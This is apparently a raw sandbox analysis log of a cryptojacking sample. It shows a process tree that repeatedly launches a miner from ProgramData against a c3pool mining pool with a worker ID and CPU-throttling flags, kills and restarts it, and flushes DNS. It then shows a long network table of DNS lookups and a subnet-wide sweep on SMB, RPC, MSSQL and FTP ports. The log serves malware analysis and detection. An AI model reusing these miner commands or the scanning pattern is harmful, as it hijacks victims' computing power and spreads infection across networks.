cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\system32\taskeng.exe

taskeng.exe {F27CB7D4-E33D-413A-9AB6-07C29C478ECE} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

Network

Country Destination Domain Proto
US 8.8.8.8:53 nishabii.xyz udp
US 8.8.8.8:53 auto.c3pool.org udp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:19490 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.49:19490 tcp
N/A 10.127.0.49:1433 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.7:135 tcp
US 8.8.8.8:53 auto.c3pool.org udp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.49:21 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.243:445 tcp
US 8.8.8.8:53 auto.c3pool.org udp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.0:1433 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.1:1433 tcp
N/A 10.127.0.2:1433 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.3:1433 tcp
N/A 10.127.0.4:1433 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.5:1433 tcp
N/A 10.127.0.6:1433 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.7:1433 tcp
N/A 10.127.0.8:1433 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.9:1433 tcp
N/A 10.127.0.10:1433 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.11:1433 tcp
N/A 10.127.0.12:1433 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.13:1433 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.14:1433 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.15:1433 tcp
N/A 10.127.0.16:1433 tcp
N/A 10.127.0.17:1433 tcp
N/A 10.127.0.18:1433 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.19:1433 tcp
N/A 10.127.0.20:1433 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.21:1433 tcp
N/A 10.127.0.22:1433 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.23:1433 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.24:1433 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.25:1433 tcp
N/A 10.127.0.26:1433 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.27:1433 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.28:1433 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.29:1433 tcp
N/A 10.127.0.30:1433 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.31:1433 tcp
N/A 10.127.0.32:1433 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.33:1433 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.34:1433 tcp
N/A 10.127.0.35:1433 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.36:1433 tcp
N/A 10.127.0.37:1433 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.38:1433 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.39:1433 tcp
N/A 10.127.0.40:1433 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.41:1433 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.42:1433 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.43:1433 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.44:1433 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.45:1433 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.46:1433 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.47:1433 tcp
N/A 10.127.0.48:1433 tcp
N/A 10.127.0.50:1433 tcp
N/A 10.127.0.51:1433 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.52:1433 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.53:1433 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.54:1433 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.55:1433 tcp
N/A 10.127.0.56:1433 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.57:1433 tcp
N/A 10.127.0.58:1433 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.59:1433 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.60:1433 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.61:1433 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.62:1433 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.63:1433 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.64:1433 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.65:1433 tcp
N/A 10.127.0.66:1433 tcp
N/A 10.127.0.67:1433 tcp
N/A 10.127.0.68:1433 tcp
N/A 10.127.0.69:1433 tcp
N/A 10.127.0.70:1433 tcp
N/A 10.127.0.71:1433 tcp
N/A 10.127.0.72:1433 tcp
N/A 10.127.0.73:1433 tcp
N/A 10.127.0.74:1433 tcp
N/A 10.127.0.75:1433 tcp
N/A 10.127.0.76:1433 tcp
US 8.8.8.8:53 nishabii.xyz udp
N/A 10.127.0.77:1433 tcp
N/A 10.127.0.78:1433 tcp
N/A 10.127.0.79:1433 tcp
N/A 10.127.0.80:1433 tcp
N/A 10.127.0.81:1433 tcp
N/A 10.127.0.82:1433 tcp
N/A 10.127.0.83:1433 tcp
N/A 10.127.0.84:1433 tcp
N/A 10.127.0.85:1433 tcp
N/A 10.127.0.86:1433 tcp
N/A 10.127.0.87:1433 tcp
N/A 10.127.0.88:1433 tcp
N/A 10.127.0.89:1433 tcp
N/A 10.127.0.90:1433 tcp
N/A 10.127.0.91:1433 tcp
N/A 10.127.0.92:1433 tcp
N/A 10.127.0.93:1433 tcp
N/A 10.127.0.94:1433 tcp
N/A 10.127.0.95:1433 tcp
N/A 10.127.0.49:19490 tcp
N/A 10.127.0.96:1433 tcp
N/A 10.127.0.97:1433 tcp
N/A 10.127.0.98:1433 tcp
N/A 10.127.0.99:1433 tcp
N/A 10.127.0.100:1433 tcp
N/A 10.127.0.101:1433 tcp
N/A 10.127.0.102:1433 tcp
N/A 10.127.0.103:1433 tcp
N/A 10.127.0.104:1433 tcp
N/A 10.127.0.105:1433 tcp
N/A 10.127.0.106:1433 tcp
N/A 10.127.0.107:1433 tcp
N/A 10.127.0.108:1433 tcp
N/A 10.127.0.109:1433 tcp
N/A 10.127.0.110:1433 tcp
N/A 10.127.0.111:1433 tcp
N/A 10.127.0.112:1433 tcp
N/A 10.127.0.113:1433 tcp
N/A 10.127.0.114:1433 tcp
N/A 10.127.0.115:1433 tcp
N/A 10.127.0.116:1433 tcp
N/A 10.127.0.117:1433 tcp
N/A 10.127.0.118:1433 tcp
N/A 10.127.0.119:1433 tcp
N/A 10.127.0.120:1433 tcp
N/A 10.127.0.121:1433 tcp
N/A 10.127.0.122:1433 tcp
N/A 10.127.0.123:1433 tcp
N/A 10.127.0.124:1433 tcp
N/A 10.127.0.125:1433 tcp
N/A 10.127.0.126:1433 tcp
N/A 10.127.0.127:1433 tcp
N/A 10.127.0.128:1433 tcp
N/A 10.127.0.129:1433 tcp
N/A 10.127.0.130:1433 tcp
N/A 10.127.0.131:1433 tcp
N/A 10.127.0.132:1433 tcp
N/A 10.127.0.133:1433 tcp
N/A 10.127.0.134:1433 tcp
N/A 10.127.0.135:1433 tcp
N/A 10.127.0.136:1433 tcp
N/A 10.127.0.137:1433 tcp
N/A 10.127.0.138:1433 tcp
N/A 10.127.0.139:1433 tcp
N/A 10.127.0.140:1433 tcp
N/A 10.127.0.141:1433 tcp
N/A 10.127.0.142:1433 tcp
N/A 10.127.0.143:1433 tcp
N/A 10.127.0.144:1433 tcp
N/A 10.127.0.145:1433 tcp
N/A 10.127.0.146:1433 tcp
N/A 10.127.0.147:1433 tcp
N/A 10.127.0.148:1433 tcp
N/A 10.127.0.149:1433 tcp
N/A 10.127.0.150:1433 tcp
N/A 10.127.0.151:1433 tcp
N/A 10.127.0.152:1433 tcp
N/A 10.127.0.153:1433 tcp
N/A 10.127.0.154:1433 tcp
N/A 10.127.0.155:1433 tcp
N/A 10.127.0.156:1433 tcp
N/A 10.127.0.157:1433 tcp
N/A 10.127.0.158:1433 tcp
N/A 10.127.0.159:1433 tcp
N/A 10.127.0.160:1433 tcp
N/A 10.127.0.161:1433 tcp
N/A 10.127.0.162:1433 tcp
N/A 10.127.0.163:1433 tcp
N/A 10.127.0.164:1433 tcp
N/A 10.127.0.165:1433 tcp
N/A 10.127.0.166:1433 tcp
N/A 10.127.0.167:1433 tcp
N/A 10.127.0.168:1433 tcp
N/A 10.127.0.169:1433 tcp
N/A 10.127.0.170:1433 tcp
N/A 10.127.0.171:1433 tcp
N/A 10.127.0.172:1433 tcp
N/A 10.127.0.173:1433 tcp
N/A 10.127.0.174:1433 tcp
N/A 10.127.0.175:1433 tcp
N/A 10.127.0.176:1433 tcp
N/A 10.127.0.177:1433 tcp
N/A 10.127.0.178:1433 tcp
N/A 10.127.0.179:1433 tcp
N/A 10.127.0.180:1433 tcp
N/A 10.127.0.181:1433 tcp
N/A 10.127.0.182:1433 tcp
N/A 10.127.0.183:1433 tcp
N/A 10.127.0.184:1433 tcp
N/A 10.127.0.185:1433 tcp
N/A 10.127.0.186:1433 tcp
N/A 10.127.0.187:1433 tcp
N/A 10.127.0.188:1433 tcp
N/A 10.127.0.190:1433 tcp
N/A 10.127.0.189:1433 tcp
N/A 10.127.0.191:1433 tcp
N/A 10.127.0.192:1433 tcp
N/A 10.127.0.193:1433 tcp
N/A 10.127.0.0:21 tcp
N/A 10.127.0.194:1433 tcp
N/A 10.127.0.1:21 tcp
N/A 10.127.0.195:1433 tcp
N/A 10.127.0.2:21 tcp
N/A 10.127.0.196:1433 tcp
N/A 10.127.0.3:21 tcp
N/A 10.127.0.197:1433 tcp
N/A 10.127.0.4:21 tcp
N/A 10.127.0.198:1433 tcp
N/A 10.127.0.5:21 tcp
N/A 10.127.0.199:1433 tcp
N/A 10.127.0.6:21 tcp
N/A 10.127.0.200:1433 tcp
N/A 10.127.0.7:21 tcp
N/A 10.127.0.201:1433 tcp
N/A 10.127.0.8:21 tcp
N/A 10.127.0.202:1433 tcp
N/A 10.127.0.9:21 tcp
N/A 10.127.0.10:21 tcp
N/A 10.127.0.203:1433 tcp
N/A 10.127.0.204:1433 tcp
N/A 10.127.0.11:21 tcp
N/A 10.127.0.205:1433 tcp
N/A 10.127.0.12:21 tcp
N/A 10.127.0.206:1433 tcp
N/A 10.127.0.13:21 tcp
N/A 10.127.0.207:1433 tcp
N/A 10.127.0.14:21 tcp
N/A 10.127.0.208:1433 tcp
N/A 10.127.0.15:21 tcp
N/A 10.127.0.209:1433 tcp
N/A 10.127.0.16:21 tcp
N/A 10.127.0.17:21 tcp
N/A 10.127.0.18:21 tcp
N/A 10.127.0.211:1433 tcp
N/A 10.127.0.210:1433 tcp
N/A 10.127.0.19:21 tcp
